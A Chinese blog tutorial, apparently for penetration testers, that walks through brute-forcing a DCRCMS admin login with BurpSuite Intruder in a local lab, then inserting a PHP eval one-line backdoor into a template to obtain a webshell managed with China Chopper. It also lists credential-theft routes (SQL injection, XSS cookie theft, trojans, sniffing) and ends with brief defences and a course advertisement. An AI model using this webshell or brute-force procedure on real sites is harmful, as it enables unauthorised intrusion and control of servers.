web后台登录口令暴力破解及防御

在实际网络安全评估测试中,前台是给用户使用,后台是给网站管理维护人员使用,前台功能相对简单,后台功能相对复杂,可能保护媒体文件上传,数据库管理等。前台用户可以自由注册,而后台是网站管理或者维护人员设定,渗透中如果能够拿到后台管理员帐号及密码,则意味着离获取webshell权限更进一步了。
1.1web后台账号及密码获取思路
1.通过sql注入获取后台账号及密码
如果网站存在sql注入漏洞,则可以通过sqlmap等工具进行漏洞测试,通过dump命令来获取整个数据库或者某个表中的数据。
2.通过跨站获取管理员帐号及密码
在前台页面中插入xss代码,通过xss平台接收。当管理员访问存在跨站页面时,会将网站管理员登录的cookie值等信息传回到xss平台,有的还可以直接获取管理员账号及密码。xss平台可以自己搭建,也可以使用网上公开的平台,例如http://xsspt.com/index.php?do=login、http://imxss.com/等。
3.通过暴力破解获取管理员帐号及密码
目前有一些工具支持后台账号及密码暴力破解,例如BurpSuite等,在本文后面会重点介绍使用BurpSuite进行后台账号及密码暴力破解。
4.通过获取数据库备份文件
有些网站由于管理失误,将数据库打包放在网站根目录,或者数据库备份文件存在于某个目录,通过目录泄露及浏览等漏洞可以直接获取数据库备份文件。在本地将其还原后,即可获取所有数据。
5.嗅探获取
对C段服务器进行渗透,或者对该目标CMS所在网络进行渗透,渗透成功后,通过Cain等工具对目标CMS的登录后台用户及口令进行嗅探。
6.其它方法
如果知道管理员的信息,可以给管理员发送木马程序,诱使其执行,控制其个人计算机后,可以通过键盘记录等方法来获取管理员账号及口令。当然也有可能管理员IE等浏览器会保存登录账号及口令。
1.2设置BurpSuite进行网站后台破解
1.启动BurpSuite
本次使用PentestBox中的BurpSuite,在PentestBox目录下启动PentestBox.exe程序,然后cd
D:\PentestBox\bin\BurpSuite目录,执行java -jar
BurpSuite.jar即可启动BurpSuite程序,如图1所示,注意执行cd命令后,使用“d:”切换到d盘当前目录,否则无法启动。pentestbox
是一个综合漏洞测试平台,跟kali比较类似,其官方站点:https://pentestbox.org/zh/,运行环境为Windows。
![在这里插入图片描述](https://img-
blog.csdnimg.cn/c2f2272fce704e2dafa69f14a1e02257.png#pic_center)

图1启动BurpSuite
2.BurpSuite启动设置
BurpSuite的启动设置比较简单,单击“Next”及“Start burp”即可,如果是专业版则需要注册码,也即需要注册许可进行注册才能使用专业版功能。
3设置IE等浏览器代理
(1)设置Chrome代理
在Chrome浏览器中单击“设置”-“高级”-“系统”-“打开代理”,在“Internet属性”窗口中单击“局域网设置”,在局域网设置窗口的代理服务器中分别设置地址127.0.0.1,端口为8080,如图2所示,同时单击“高级”设置对所有协议均使用相同的代理服务器。
![在这里插入图片描述](https://img-
blog.csdnimg.cn/969898fa4ac647d59b901816af5582bc.png#pic_center)

图2设置浏览器代理
(2)设置BurpSuite代理
单击“Proxy”-“Options”,如图3所示,设置“Interface”值为127.0.0.1:8080,默认情况下不需要进行修改。
![在这里插入图片描述](https://img-
blog.csdnimg.cn/8896ea7b19ee47c2a436b6753f7db71c.png#pic_center)

图3设置BurpSuite
1.3测试前准备工作

  1. comsenz测试平台
    测试平台选择在Windows下安装comsenz
    (官方网站:http://www.comsenz.com/)程序下载地址:http://download2.comsenz.com/ComsenzEXP/x2.5/ComsenzEXP_X25GBK.exe,下载后执行安装即可,安装完毕后记住MySQL数据库root账号的密码(默认为1111111),然后将其代码所在全部文件移除到其他文件目录。例如本例安装D:\ComsenzEXP\wwwroot,则需要将wwwroot下所有文件剪切到其它位置。
    2.测试cms系统
    测试cms系统选择稻草人cms系统,下载地址http://www.dcrcms.com/news.php?id=2,选择1.0.5版本即可。下载地址:http://www.dcrcms.com/uploads/program/dcr_qy(gbk)_1.0.5.1.rar。将该cms压缩包解压后,全部复制到D:\ComsenzEXP\wwwroot目录,然后在浏览器中打开http://127.0.0.1进行cms安装,根据提示即可完成安装,在安装前需要创建一个数据库,例如dcr,安装完成后,第一次使用默认密码admin/admin进行登录,将admin密码修改为abc123。
    3.在浏览器中使用随机密码进行登录
    如图4所示,打开地址http://127.0.0.1/dcr_qy(utf)_1.0.5/dcr/login.htm,在用户名及密码中分别输入admin/admin进行登录,登录结果显示“您输入的用户名或密码,请重新输入”,完成一次交互登录,由于是错误的密码,因此未能进入后台,由于安装程序的编码版本不一样,有些可能会显示乱码。
    ![在这里插入图片描述](https://img-
    blog.csdnimg.cn/c3aa8dc7d7674262934579cbfcadb2c8.png#pic_center)

图4完成一次交互登录
1.4使用BurpSuite进行暴力破解
1放行数据包
单击“Proxy”-“Intercept”,如图5所示,单击“Forward”放行数据包通过,单击“Drop”丢弃抓包数据,如果设置“Intercept
is
off”则不用进行放行操作。在设置浏览器代理时一定要查看本地地址,如果对本地进行测试,则需要进行清除,也即所有地址全部使用代理,否则访问测试网站地址后在BurpSuite中没有数据包。
![在这里插入图片描述](https://img-
blog.csdnimg.cn/36ea107b7a13472c85b5311c1834b3da.png#pic_center)

图5设置数据库包交互
2.查看抓包情况
在BurpSuite中单击“HTTP History”,如图6所示,可以看到第3条历史为本次测试数据,选中该记录右键单击选择“Send to
Intruder”。
![在这里插入图片描述](https://img-
blog.csdnimg.cn/bc183073d1f4476085d90c4ea1b96619.png#pic_center)

图6查看抓包情况
3设置 Intruder
(1)设置变量§

Intruder中对“username=§admin§&password=§admin§&admin_yz=§5781§&x=§37§&y=§9§”进行设置,设置其值为:username=admin&password=§admin§&admin_yz=5781&x=37&y=9,如图7所示,也即去掉username前的变量§以及x=37&y=9中的变量§,添加与去掉§变量,在BurpSuite的右方单击“Add
§”及“Clear §”按钮即可。测试变量时一定仅仅保持password的变量,对cookie等中的变量也全部去除掉。
![在这里插入图片描述](https://img-
blog.csdnimg.cn/8110b4ade10c4fba99bb4f7f19c7ae5c.png#pic_center)

图7设置变量§
(2)设置字典
单击“Payloads”,在其中设置如图8所示,单击“Load”装载密码字典。Payload Sets中设置为“1”,“Simple
list”,密码个数为3018。
![在这里插入图片描述](https://img-
blog.csdnimg.cn/1fa6c77dff6941e592c82a179e429bb7.png#pic_center)

图8设置字典
(3)捕获出错信息
经过提交错误的密码后,其浏览器会反馈一个结果,如图9所示,将其复制到剪贴板中,“鎮ㄨ緭鍏ョ殑鐢ㄦ埛鍚嶆垨瀵嗙爜锛岃閲嶆柊杈撳叆”信息值用来判断密码登录出错的反馈值。
![在这里插入图片描述](https://img-
blog.csdnimg.cn/a16c2c6d00e946e2a635d7d876f85ac9.png#pic_center)

图9捕获出错信息
(4)设置错误反馈Flag
在Intruder窗口单击“Options”,在Add右边的输入框中粘帖刚才复制的值“鎮ㄨ緭鍏ョ殑鐢ㄦ埛鍚嶆垨瀵嗙爜锛岃閲嶆柊杈撳叆”,如图10所示,该值一定是原始值。
![在这里插入图片描述](https://img-
blog.csdnimg.cn/52944e8c46814fe1a245aa2c657a2097.png#pic_center)

图10设置错误反馈值
4.执行暴力破解
在Intruder中,单击“Target”-“Start
attack”后,会弹出一个警示窗口,确定即可,如图11所示,BurpSuite将会根据设置进行暴力破解。
![在这里插入图片描述](https://img-
blog.csdnimg.cn/752c79ddadd0423099b70e4f8dd7e90a.png#pic_center)

图11执行暴力破解
5.查看暴力破解结果
在BurpSuite破解结束后,可以对Length进行排序,如图12所示,显示长度不一致的结果即为破解成功的记录,在本案例中有两个密码,其密码分别为18和39位,均为破解成功,也即密码为abc123。
![在这里插入图片描述](https://img-
blog.csdnimg.cn/a6a1c376af7f4ace93a932e3ac0f9b93.png#pic_center)

图12破解后台密码
6.成功登录后台
重新使用admin/abc123进行登录,如图13所示,成功登录后台。
![在这里插入图片描述](https://img-
blog.csdnimg.cn/256779c009d047dd9d9cfb096cf643c8.png#pic_center)

图13成功登录后台
1.5后台获取webshell
1.文件模板管理
如图14所示,单击“模板管理”-“模板文件管理器”,可以对其中的模板文件进行编辑以及改名等操作。
![在这里插入图片描述](https://img-
blog.csdnimg.cn/331590889ab54c1abe63a19b2431360b.png#pic_center)

图14文件模板管理
2.模板文件插入一句话后门代码
在模板文件管理器中选择left.html网页模板文件,如图15所示,在其中粘帖一句话后门代码:<?php @eval($_POST['chopper2012']);?>,单击“修改”,保存模板文件。
![在这里插入图片描述](https://img-
blog.csdnimg.cn/72d8422dbfdb449290d4e10acd7af497.png#pic_center)

图15在模板文件中插入一句话后门
3.重命名模板文件
如图16所示,将原文件名更名为left.php,保存修改;在有些情况下,可能无法进行模板重命名为脚本文件,如果网站服务器存在IIS等解析漏洞,则可以使用1.asp;.html类似名称来命名。
![在这里插入图片描述](https://img-
blog.csdnimg.cn/f8031b1cfa7d47a88dc62a5ec3aa84fd.png#pic_center)

图16重命名模板文件
4.获取webshell
(1)获取webshell地址
回到文件管理器中,直接打开left.php链接地址,如图17所示,获取其真实的url地址:http://127.0.0.1/dcr_qy(utf)_1.0.5/templets/default/left.php,该地址为一句话后门地址,密码为chopper2012。
![在这里插入图片描述](https://img-
blog.csdnimg.cn/eeb8165affcb4398a007fa9d04ced206.png#pic_center)

图17获取webshell地址
(2)使用中国菜刀一句话后门程序管理webshell
如图18所示,在中国菜刀后门一句话管理程序中新增一条记录,密码为chopper2012,双击新增webshell记录,成功获取webshell。
![在这里插入图片描述](https://img-
blog.csdnimg.cn/464b60758d0a43da81525aabaaaf4380.png#pic_center)

图18获取webshell
说明:由于是在本机搭建的平台,因此http://127.0.0.1/dcr_qy(utf)_1.0.5/dcr/login.htm跟http://192.168.1.191/dcr_qy(utf)_1.0.5/dcr/login.htm为同一套系统,后面是使用IP地址进行访问,前面是通用本机本地测试IP地址。
1.6总结及其暴力破解防御
1.使用BurpSuite进行后台密码暴力破解总结
(1)BurpSuite暴力破解的成功取决于字典的有效。
(2)对于渗透中通过扫描获取的后台地址,可以通过本文的方法来进行测试。
(3)测试前需要收集和准备密码字典文件,可以使用泄露top 10000等密码来做字典,对于公司则可以单独生成字典,例如公司名称+日期等。
2.密码暴力破解安全防范
(1)根据前面的破解过程及思路,设置强密码,使破解的时间成本较长,一般不容易被破解。
(2)修改默认后台管理员账号名称,例如修改admin为my_admin等。
(3)对后台登陆IP地址进行授权管理,非授权IP禁止访问。
(4)对后台登录IP跟MAC地址绑定,因为后台管理人员是已知的,因此可以通过程序来设置只有MAC地址等信息匹配才能进行后台管理,有的后台甚至设置了多次安全验证,比如手机短信验证,动态key等。

接下来我将给各位同学划分一张学习计划表!

学习计划

那么问题又来了,作为萌新小白,我应该先学什么,再学什么?
既然你都问的这么直白了,我就告诉你,零基础应该从什么开始学起:

阶段一:初级网络安全工程师

接下来我将给大家安排一个为期1个月的网络安全初级计划,当你学完后,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web渗透、安全服务、安全分析等岗位;其中,如果你等保模块学的好,还可以从事等保工程师。

综合薪资区间6k~15k

1、网络安全理论知识(2天)
①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)

2、渗透测试基础(1周)
①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系统基础(1周)
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)

4、计算机网络基础(1周)
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现

5、数据库基础操作(2天)
①数据库基础
②SQL语言基础
③数据库安全加固

6、Web渗透(1周)
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)

那么,到此为止,已经耗时1个月左右。你已经成功成为了一名“脚本小子”。那么你还想接着往下探索吗?

阶段二:中级or高级网络安全工程师(看自己能力)

综合薪资区间15k~30k

7、脚本编程学习(4周)
在网络安全领域。是否具备编程能力是“脚本小子”和真正网络安全工程师的本质区别。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力。

零基础入门的同学,我建议选择脚本语言Python/PHP/Go/Java中的一种,对常用库进行编程学习
搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP,IDE强烈推荐Sublime;

Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,没必要看完

用Python编写漏洞的exp,然后写一个简单的网络爬虫

PHP基本语法学习并书写一个简单的博客系统

熟悉MVC架构,并试着学习一个PHP框架或者Python框架 (可选)

了解Bootstrap的布局或者CSS。

阶段三:顶级网络安全工程师

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

学习资料分享

当然,只给予计划不给予学习资料的行为无异于耍流氓,这里给大家整理了一份【282G】的网络安全工程师从入门到精通的学习资料包,可点击下方二维码链接领取哦。

  • 12
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值